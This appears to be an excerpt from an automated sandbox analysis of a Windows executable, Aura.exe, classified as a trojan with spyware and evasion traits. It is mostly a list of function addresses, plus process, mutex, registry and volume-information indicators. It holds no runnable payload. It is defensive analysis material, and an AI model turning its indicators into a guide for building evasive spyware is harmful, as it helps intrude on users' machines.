Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C3AE80	0_2_00C3AE80
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C23EA0	0_2_00C23EA0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C05EB0	0_2_00C05EB0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C00E10	0_2_00C00E10
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C47E10	0_2_00C47E10
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BEDE60	0_2_00BEDE60
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C0FE20	0_2_00C0FE20
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C06FC0	0_2_00C06FC0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C32FC0	0_2_00C32FC0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C26F90	0_2_00C26F90
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C3FF90	0_2_00C3FF90
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BF3F20	0_2_00BF3F20
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00BEBF10	0_2_00BEBF10
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C02F10	0_2_00C02F10
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C3EF10	0_2_00C3EF10
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C028C0	2_2_00C028C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C000E0	2_2_00C000E0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BEC890	2_2_00BEC890
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C390F0	2_2_00C390F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C4B0F0	2_2_00C4B0F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BFA0F0	2_2_00BFA0F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C26090	2_2_00C26090
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF50E0	2_2_00BF50E0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C098A0	2_2_00C098A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C278A0	2_2_00C278A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C398B0	2_2_00C398B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BEE030	2_2_00BEE030
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BFD810	2_2_00BFD810
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C1C870	2_2_00C1C870
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C1D070	2_2_00C1D070
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BE1000	2_2_00BE1000
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C42800	2_2_00C42800
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C1A810	2_2_00C1A810
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C36010	2_2_00C36010
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BFF860	2_2_00BFF860
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C0E020	2_2_00C0E020
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF3840	2_2_00BF3840
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C1E9C0	2_2_00C1E9C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C441D0	2_2_00C441D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF01A0	2_2_00BF01A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF89A0	2_2_00BF89A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BE8990	2_2_00BE8990
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BFF190	2_2_00BFF190
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BED1E0	2_2_00BED1E0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BE41D0	2_2_00BE41D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C17170	2_2_00C17170
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BFE900	2_2_00BFE900
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C18900	2_2_00C18900
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C4D90A	2_2_00C4D90A
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C10110	2_2_00C10110
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C34110	2_2_00C34110
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BEB960	2_2_00BEB960
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C36920	2_2_00C36920
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF9150	2_2_00BF9150
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C18130	2_2_00C18130
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF6940	2_2_00BF6940
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C522CA	2_2_00C522CA
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF82B0	2_2_00BF82B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF7AA0	2_2_00BF7AA0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C122F0	2_2_00C122F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C03A90	2_2_00C03A90
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C05290	2_2_00C05290
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C18AA0	2_2_00C18AA0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C412B0	2_2_00C412B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C47AB0	2_2_00C47AB0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C13A50	2_2_00C13A50
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C28A70	2_2_00C28A70
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C03200	2_2_00C03200
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C31A00	2_2_00C31A00
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C42210	2_2_00C42210
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C43A20	2_2_00C43A20
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C58230	2_2_00C58230
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BE7240	2_2_00BE7240
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C293D0	2_2_00C293D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF1BA0	2_2_00BF1BA0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BFE3A0	2_2_00BFE3A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C493E0	2_2_00C493E0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF0B90	2_2_00BF0B90
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C0ABF0	2_2_00C0ABF0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C1ABF0	2_2_00C1ABF0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BFDB80	2_2_00BFDB80
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C153A0	2_2_00C153A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C37BB0	2_2_00C37BB0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C2EB40	2_2_00C2EB40
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C2A350	2_2_00C2A350
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C30350	2_2_00C30350
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C09360	2_2_00C09360
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BE8310	2_2_00BE8310
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BFB310	2_2_00BFB310
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BEA300	2_2_00BEA300
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BE7B00	2_2_00BE7B00
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C2130F	2_2_00C2130F
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C07320	2_2_00C07320
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C21320	2_2_00C21320
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF7B50	2_2_00BF7B50
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C3BCC0	2_2_00C3BCC0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C384C0	2_2_00C384C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C4A4C0	2_2_00C4A4C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BE54D0	2_2_00BE54D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C24CB0	2_2_00C24CB0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF4430	2_2_00BF4430
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF0430	2_2_00BF0430
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C05450	2_2_00C05450
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C26460	2_2_00C26460
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF4C10	2_2_00BF4C10
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BFD410	2_2_00BFD410
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C13C70	2_2_00C13C70
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C02C00	2_2_00C02C00
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C41C00	2_2_00C41C00
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BFEC70	2_2_00BFEC70
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C13410	2_2_00C13410
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF2450	2_2_00BF2450
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C33430	2_2_00C33430
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C055C0	2_2_00C055C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C1F5D0	2_2_00C1F5D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C17DD0	2_2_00C17DD0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C1DDD9	2_2_00C1DDD9
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C0B5F0	2_2_00C0B5F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C27DF0	2_2_00C27DF0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C02D80	2_2_00C02D80
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C1DD80	2_2_00C1DD80
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C65592	2_2_00C65592
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF0DE0	2_2_00BF0DE0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C1C5A0	2_2_00C1C5A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BE8DD0	2_2_00BE8DD0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BE9D30	2_2_00BE9D30
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF6530	2_2_00BF6530
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C1B560	2_2_00C1B560
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C43D60	2_2_00C43D60
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF3510	2_2_00BF3510
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C09D00	2_2_00C09D00
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C3FD00	2_2_00C3FD00
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C39500	2_2_00C39500
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C1FD20	2_2_00C1FD20
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BECD50	2_2_00BECD50
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C03530	2_2_00C03530
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C1AEC0	2_2_00C1AEC0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BE16B0	2_2_00BE16B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C1D6E0	2_2_00C1D6E0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C186E0	2_2_00C186E0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C2AEE0	2_2_00C2AEE0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BE9690	2_2_00BE9690
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BEE690	2_2_00BEE690
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C066F0	2_2_00C066F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C22E80	2_2_00C22E80
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BEB6F0	2_2_00BEB6F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C35690	2_2_00C35690
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C23EA0	2_2_00C23EA0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C05EB0	2_2_00C05EB0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF76C0	2_2_00BF76C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C44640	2_2_00C44640
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C29650	2_2_00C29650
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF0620	2_2_00BF0620
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C49E60	2_2_00C49E60
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BEC610	2_2_00BEC610
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C00E10	2_2_00C00E10
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C47E10	2_2_00C47E10
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BEDE60	2_2_00BEDE60
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C0FE20	2_2_00C0FE20
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C06FC0	2_2_00C06FC0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C32FC0	2_2_00C32FC0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C307F0	2_2_00C307F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C26F90	2_2_00C26F90
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C3FF90	2_2_00C3FF90
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BE27E0	2_2_00BE27E0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C01F50	2_2_00C01F50
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF3F20	2_2_00BF3F20
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BEBF10	2_2_00BEBF10
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BEA700	2_2_00BEA700
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C02F10	2_2_00C02F10
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C63718	2_2_00C63718
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00BF9740	2_2_00BF9740
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00445140	4_2_00445140
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00422100	4_2_00422100
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0040B990	4_2_0040B990
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_004182C0	4_2_004182C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00448BF0	4_2_00448BF0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00445380	4_2_00445380
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0044D3A0	4_2_0044D3A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00438460	4_2_00438460
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0040EC10	4_2_0040EC10
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00428CA0	4_2_00428CA0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0041C582	4_2_0041C582
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0042CE60	4_2_0042CE60
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00416637	4_2_00416637
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_004306A0	4_2_004306A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00411EAA	4_2_00411EAA
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0044DEB0	4_2_0044DEB0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0041EF24	4_2_0041EF24
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_004137DF	4_2_004137DF
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0044B783	4_2_0044B783
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00438FAC	4_2_00438FAC
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00401040	4_2_00401040
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0042105B	4_2_0042105B
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00436830	4_2_00436830
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0044D830	4_2_0044D830
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0044C0DB	4_2_0044C0DB
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0043D8E0	4_2_0043D8E0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_004340E6	4_2_004340E6
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0044C8F0	4_2_0044C8F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0040C890	4_2_0040C890
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_004448A0	4_2_004448A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0041E0A8	4_2_0041E0A8
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0042B947	4_2_0042B947
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00425160	4_2_00425160
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00428110	4_2_00428110
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0043193D	4_2_0043193D
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_004491D0	4_2_004491D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_004269E0	4_2_004269E0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_004109F3	4_2_004109F3
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0043F9F0	4_2_0043F9F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0043C9F8	4_2_0043C9F8
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0044C9B0	4_2_0044C9B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0044CA40	4_2_0044CA40
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0043924D	4_2_0043924D
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00438A51	4_2_00438A51
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00438A6E	4_2_00438A6E
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0042DA00	4_2_0042DA00
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00408A20	4_2_00408A20
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00438224	4_2_00438224
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0042FAD0	4_2_0042FAD0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_004462D0	4_2_004462D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00402AE0	4_2_00402AE0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00421AE5	4_2_00421AE5
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_004172F5	4_2_004172F5
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00433AFF	4_2_00433AFF
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00424A82	4_2_00424A82
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00432A87	4_2_00432A87
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0040A290	4_2_0040A290
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0040DA90	4_2_0040DA90
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00411290	4_2_00411290
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0044AA95	4_2_0044AA95
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0041C582	4_2_0041C582
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0044DB50	4_2_0044DB50
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00428B57	4_2_00428B57
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0041E360	4_2_0041E360
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00444B00	4_2_00444B00
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0042FB2B	4_2_0042FB2B
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_004333C0	4_2_004333C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0041CBC4	4_2_0041CBC4
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_004393C4	4_2_004393C4
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0040C440	4_2_0040C440
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00425450	4_2_00425450
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0041FC79	4_2_0041FC79
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0042DC0A	4_2_0042DC0A
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0043FC20	4_2_0043FC20
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00420C32	4_2_00420C32
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0042DC30	4_2_0042DC30
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0044A43E	4_2_0044A43E
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_004034F0	4_2_004034F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00430CF0	4_2_00430CF0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_004434F9	4_2_004434F9
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_004094B0	4_2_004094B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00407D40	4_2_00407D40
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00425D40	4_2_00425D40
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00437555	4_2_00437555
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00436D66	4_2_00436D66
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00424500	4_2_00424500
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00424A82	4_2_00424A82
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00431D9C	4_2_00431D9C
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00439DA0	4_2_00439DA0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0043D5B0	4_2_0043D5B0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00417DBB	4_2_00417DBB
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00446DBF	4_2_00446DBF
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0043BE43	4_2_0043BE43
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0041DE50	4_2_0041DE50
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00449660	4_2_00449660
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0044C670	4_2_0044C670
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00437678	4_2_00437678
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0040D620	4_2_0040D620
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0041D623	4_2_0041D623
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00429E30	4_2_00429E30
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0040FEF0	4_2_0040FEF0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00430EF0	4_2_00430EF0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00403E90	4_2_00403E90
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0042F690	4_2_0042F690
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0044A6A9	4_2_0044A6A9
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0042D6BB	4_2_0042D6BB
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0044C750	4_2_0044C750
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0040CF70	4_2_0040CF70
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00404772	4_2_00404772
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00432F70	4_2_00432F70
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00406F76	4_2_00406F76
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00432F08	4_2_00432F08
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00421710	4_2_00421710
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00408F30	4_2_00408F30
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_00445FD0	4_2_00445FD0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0041F7F1	4_2_0041F7F1
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_004297B0	4_2_004297B0

Source: C:\Users\user\Desktop\Aura.exe	Code function: String function: 0040B280 appears 51 times
Source: C:\Users\user\Desktop\Aura.exe	Code function: String function: 0041B880 appears 94 times
Source: C:\Users\user\Desktop\Aura.exe	Code function: String function: 00C5AE24 appears 34 times
Source: C:\Users\user\Desktop\Aura.exe	Code function: String function: 00C4DE10 appears 97 times
Source: C:\Users\user\Desktop\Aura.exe	Code function: String function: 00C5607C appears 44 times

Source: C:\Users\user\Desktop\Aura.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7808 -s 404

Source: Aura.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Aura.exe	Static PE information: Section: .bss ZLIB complexity 1.000333325987306
Source: Aura.exe	Static PE information: Section: .bss ZLIB complexity 1.000333325987306

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/6@4/3

Source: C:\Users\user\Desktop\Aura.exe

Code function: 4_2_00445380 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

4_2_00445380

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7808
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\24453ea3-3b81-4b89-ba79-0496d7d118db

Jump to behavior

Source: Aura.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Aura.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Aura.exe, 00000004.00000003.1255779413.000000000390F000.00000004.00000800.00020000.00000000.sdmp

